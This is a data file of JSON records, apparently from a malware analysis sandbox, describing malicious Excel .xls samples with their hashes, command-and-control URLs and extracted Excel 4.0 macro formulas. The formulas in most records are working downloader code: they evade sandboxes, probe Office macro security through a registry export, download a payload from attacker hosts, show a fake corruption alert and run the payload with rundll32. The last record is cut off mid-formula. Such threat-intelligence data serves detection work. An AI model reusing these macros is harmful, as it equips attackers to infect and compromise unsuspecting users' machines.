{"version":"0.2","sample":{"sample":"","kind":"file","target":"50878a8c9afbed935c1107f7c43e60e9091c060610c3a455cdaef3e87a77b284"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50878a8c9afbed935c1107f7c43e60e9091c060610c3a455cdaef3e87a77b284","filesize":214528,"md5":"6711de341f60ba66f578f7a916dc17a4","sha1":"80050b0cc2b66efe988ef80b94fbc523c3da8cbb","sha256":"50878a8c9afbed935c1107f7c43e60e9091c060610c3a455cdaef3e87a77b284","sha512":"8616dcad9f6c90e45c018aea0bddd4e2d4843d18732703ce7329bba4f9e81930b1b949955dc1d291656cad70d26d55d59b0f91b6d81299a5cc51099ff5115aad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50878a8c9afbed935c1107f7c43e60e9091c060610c3a455cdaef3e87a77b284.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3wEr9pE0Tx\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5098219f8cb109445e090aab8752e7680cc2da8a079f892b3aa1b1ccb02717ef"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"5098219f8cb109445e090aab8752e7680cc2da8a079f892b3aa1b1ccb02717ef","filesize":152576,"md5":"eb142fee631be53e9e42f3a8d17e5ee1","sha1":"2a4b6ad388df6eba44d2b837059f2b13d9b139eb","sha256":"5098219f8cb109445e090aab8752e7680cc2da8a079f892b3aa1b1ccb02717ef","sha512":"9dda955ab529586f269f62060834ad5138c65859f4d1e94655ff6abbc7f8b5ba635e64901529762c34883a0e116a72f2de637c655dc6e01f9a193f35cbe2d92e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5098219f8cb109445e090aab8752e7680cc2da8a079f892b3aa1b1ccb02717ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KNzV6CYImm\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"509d7e13fbfd66b13bae6339f8d1d3364d1a9aa23be90bbefd0ad0597080ba35"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"509d7e13fbfd66b13bae6339f8d1d3364d1a9aa23be90bbefd0ad0597080ba35","filesize":185344,"md5":"92ea54f0923eec86482407ad4d083c00","sha1":"4ec1a714193d8b700c4bd610df53d66349e4f7ab","sha256":"509d7e13fbfd66b13bae6339f8d1d3364d1a9aa23be90bbefd0ad0597080ba35","sha512":"7bddb54a712629ff1a86a0ef651011ba698a6da9b4e155f838ee3c540ed1b6b5cb7f580325b2b30410dd789cb9c41ef37c11f7309d8b242f09ad2434008657de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"509d7e13fbfd66b13bae6339f8d1d3364d1a9aa23be90bbefd0ad0597080ba35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50b9c7a95ec5a2447fa7b63ef56dbfb3528e00146557eefa5562d11eaaedbd72"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50b9c7a95ec5a2447fa7b63ef56dbfb3528e00146557eefa5562d11eaaedbd72","filesize":160768,"md5":"d14d28c9661e571698187bcc345769ee","sha1":"fce77332ca9b37f597b2f98e001cc437a4c3a49f","sha256":"50b9c7a95ec5a2447fa7b63ef56dbfb3528e00146557eefa5562d11eaaedbd72","sha512":"676e7dc339bb64506dcb030eb37d69e81ad09e6d3b485ae499b9910a1b883e4832291d92c3b4bebf122913829ea8d15fc47a6e12ec3f540aaecc554e6818bfef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50b9c7a95ec5a2447fa7b63ef56dbfb3528e00146557eefa5562d11eaaedbd72.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ECEuNsf0eq\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50be5d2e8337390400fff873881c2d12a5e410047734161b10a76c7f27c9cfc2"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50be5d2e8337390400fff873881c2d12a5e410047734161b10a76c7f27c9cfc2","filesize":209920,"md5":"6d19b4e8b3c26926a111657fa8dd0a56","sha1":"4e6d471aedb1162fc1e838f090bfc0104479a80e","sha256":"50be5d2e8337390400fff873881c2d12a5e410047734161b10a76c7f27c9cfc2","sha512":"d4bc439c3c4ab48f0b7ac1029bb52bfc0a487356d1d128d1227f564db71b2eae63c31cfb30977ccd6cc57a4f51734156209428502d6d8111a8dfb5fc7821a277","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50be5d2e8337390400fff873881c2d12a5e410047734161b10a76c7f27c9cfc2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BRrvCTViAt\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50c595534855d76e1134def8d66ec2a1b8c48e41209f59f517149c046818ae90"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50c595534855d76e1134def8d66ec2a1b8c48e41209f59f517149c046818ae90","filesize":171008,"md5":"fcb44409d8fe92fbc12dbe4fcbfaa553","sha1":"77a1030698bac691131ad022f1e290ce330f3331","sha256":"50c595534855d76e1134def8d66ec2a1b8c48e41209f59f517149c046818ae90","sha512":"868670ba080832e24a16a483f7852d369b66658070ca43e71020c8ac1d3ad37c0e74460df9a8eed99bc6d6b6f8664e947d90ea347603d823a7c664eeedb4546b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50c595534855d76e1134def8d66ec2a1b8c48e41209f59f517149c046818ae90.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BaJW9Uc5c8\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50d556c24dea25bcb2a8dfc0d6e9116a985a707286823288e92031b6635c9eb0"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50d556c24dea25bcb2a8dfc0d6e9116a985a707286823288e92031b6635c9eb0","filesize":185344,"md5":"7ff107ce7f4309a198adbb1008b99598","sha1":"3ebe6290b90e367f4c9e6357cfffbc5bff98ac2b","sha256":"50d556c24dea25bcb2a8dfc0d6e9116a985a707286823288e92031b6635c9eb0","sha512":"050d51d5128e753b317ff80c8a15dc603691cd961d0286d416058da8241db3b3a79d8fe864e54afb8f9b168bd330905da3750630a8a4060c49238e26ff82ff63","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50d556c24dea25bcb2a8dfc0d6e9116a985a707286823288e92031b6635c9eb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50d815805036430958dcd8a53588a0721f5378ef797dce7d127c6f56fdadffc5"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50d815805036430958dcd8a53588a0721f5378ef797dce7d127c6f56fdadffc5","filesize":745984,"md5":"fef76e9a9ef2ea091f9c7ee8db187775","sha1":"9fcc600c11fd8b798474e00136e753f077f1cc85","sha256":"50d815805036430958dcd8a53588a0721f5378ef797dce7d127c6f56fdadffc5","sha512":"58ebcb0bdc35ec4ca70b7410f387fbb417add36f926ce9f958029d5202eda6fb0d2c3d748724072d6bd1ef703190a1aee07fe56a855909d5553528835ceef6f9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50d815805036430958dcd8a53588a0721f5378ef797dce7d127c6f56fdadffc5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$65C$6,R$63C$6)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50ee1f779e32f3a7dd6230c291c07bac494541e13b0e436312fd77c5af8de5d3"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50ee1f779e32f3a7dd6230c291c07bac494541e13b0e436312fd77c5af8de5d3","filesize":170496,"md5":"d004a0a3d97232a5e36fb8f782599be7","sha1":"f7999cfb2412c5cfecf543da5af6dc37277d4fc1","sha256":"50ee1f779e32f3a7dd6230c291c07bac494541e13b0e436312fd77c5af8de5d3","sha512":"625f29619e838d4d45ac6fad9cf25797f552f537c2f56ae635be2b49c4015babdfe4fa8d8f8a28f95aed40da95ab3e53c42904645250790436507c1287723a0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50ee1f779e32f3a7dd6230c291c07bac494541e13b0e436312fd77c5af8de5d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VLikoKpj32\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"50f754e5fdf4185eb356168c862c9ee5b340f6228172b9232e502e754cc6cdc1"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"50f754e5fdf4185eb356168c862c9ee5b340f6228172b9232e502e754cc6cdc1","filesize":167936,"md5":"d3f7500b3f48435571fbead680ea24e1","sha1":"be932675d659d9a1f7e7ad503a06ffb3d2f7c7ec","sha256":"50f754e5fdf4185eb356168c862c9ee5b340f6228172b9232e502e754cc6cdc1","sha512":"d23fea4428a748b7fb84d067ec36cd1b4a61d95c1e3e391ea9d26be7cfd0445468c047bfa122f1d981b644f6e65d937fef7d9d1e546a74d7c599413bc3b4d44d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"50f754e5fdf4185eb356168c862c9ee5b340f6228172b9232e502e754cc6cdc1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cmN9XRHYrP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"510120cd043c0790d7ee214257d8fd84b0437b241053003042fe858feb2a4555"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"510120cd043c0790d7ee214257d8fd84b0437b241053003042fe858feb2a4555","filesize":221184,"md5":"abfe836939afc9024b4d1fc48a166837","sha1":"8f9ddb1bb6f6877e68c11cf798f72d848a06d89c","sha256":"510120cd043c0790d7ee214257d8fd84b0437b241053003042fe858feb2a4555","sha512":"86801c506277da0c95a95c9d7502fed7a63553083b1a78035fda3f1f86861b9875c9573f43b75c85044ba11e3732809b1f9243ce3aab65958876263bfd9871aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"510120cd043c0790d7ee214257d8fd84b0437b241053003042fe858feb2a4555.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vvKSWihGOV\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5106f6e4832b29a53ebb7148b990a3908f77d68471ec5d6efee48522685b662a"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"5106f6e4832b29a53ebb7148b990a3908f77d68471ec5d6efee48522685b662a","filesize":206336,"md5":"e730f0e372491de9183820d6f8cba415","sha1":"98e3ab9e84e978fbfc1cfbfdcc425a34654d6227","sha256":"5106f6e4832b29a53ebb7148b990a3908f77d68471ec5d6efee48522685b662a","sha512":"c025802986a02b1e07ada2a69ed2bea5c25586f3b3a333f7862da6def66ef51170f848f16c99a0ddcc9ef55c9b1f8394e74137a03b54c41fb8cc8d0a2e9cac23","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5106f6e4832b29a53ebb7148b990a3908f77d68471ec5d6efee48522685b662a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3dD1Mc8riW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"511a79cec7dbbc10cdcd69d4825eb3fb758a7390f2e6f2dfe97f9ebaddc3ab7b"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"511a79cec7dbbc10cdcd69d4825eb3fb758a7390f2e6f2dfe97f9ebaddc3ab7b","filesize":185344,"md5":"cad4998ce88fb0f0e27d7f5b268d2b14","sha1":"64b7b90613f5be17638edbccd8bb8b484b3c410a","sha256":"511a79cec7dbbc10cdcd69d4825eb3fb758a7390f2e6f2dfe97f9ebaddc3ab7b","sha512":"0717c5816294e71cbb49203bec2ffadc2929c551176ee1bd546fe1290391ec031279ad8810f5797bd7aa6a47012717118a0a914210ea3565035dd6a0a71e5c20","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"511a79cec7dbbc10cdcd69d4825eb3fb758a7390f2e6f2dfe97f9ebaddc3ab7b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"511db750b2ba8f95976a1e41b871130587c24b2d1bead0f5c75f2c561e9c9ec1"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"511db750b2ba8f95976a1e41b871130587c24b2d1bead0f5c75f2c561e9c9ec1","filesize":141312,"md5":"caa6cd995c5e4bc12b68148284fa64e1","sha1":"2f3875a606692ec8258dc4773c2df76874f9c25e","sha256":"511db750b2ba8f95976a1e41b871130587c24b2d1bead0f5c75f2c561e9c9ec1","sha512":"6757696805969441bc6c0ff6def067df239949e9968d8ad99bef8423824243c034f8ded02ee6c2f49995a18b293e96185b94c4fa9fe35d5d9d2658fa5f35654a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"511db750b2ba8f95976a1e41b871130587c24b2d1bead0f5c75f2c561e9c9ec1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"n2tFKA0JMB\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"511e5489319f74a58c54254b9c257f907ddba21fba004dd73eb597b0ed2a7b68"},"analysis":{"reported":"2020-04-09T16:16:16Z","score":10},"files":[{"filename":"511e5489319f74a58c54254b9c257f907ddba21fba004dd73eb597b0ed2a7b68","filesize":112640,"md5":"2cc72bbf1d39a4e49e3ddf3043d8048f","sha1":"7d16c16fa03fe8aa32cd481041643207d8747605","sha256":"511e5489319f74a58c54254b9c257f907ddba21fba004dd73eb597b0ed2a7b68","sha512":"85ff9abf10ae37e9be62edb4318315c4b4f3774f157b64601824a4c1bc7ac7bf91a0c809e63597cbb64914d92726cfec87b065ac0fbb612d4dce44f722088395","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"511e5489319f74a58c54254b9c257f907ddba21fba004dd73eb597b0ed2a7b68.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5125bf7cbf121c29a4bd3fa8b681eef44163966bf359e7f34b01fc284bcdc78b"},"analysis":{"reported":"2020-04-09T16:16:17Z","score":10},"files":[{"filename":"5125bf7cbf121c29a4bd3fa8b681eef44163966bf359e7f34b01fc284bcdc78b","filesize":177152,"md5":"24b87d8006e3a73fe7081d0994350881","sha1":"10e2527e4a17c0d572ec5dc5f129df9ebde873ef","sha256":"5125bf7cbf121c29a4bd3fa8b681eef44163966bf359e7f34b01fc284bcdc78b","sha512":"720c6d29d91090ab3355f90cf3fc6e3da9544ae443eeaceda981a847fbf4e4e2725d75c8ea6a8e2d72f0799d3d7153a9202f3e21f31589cc74f9c28a6609795e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5125bf7cbf121c29a4bd3fa8b681eef44163966bf359e7f34b01fc284bcdc78b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, 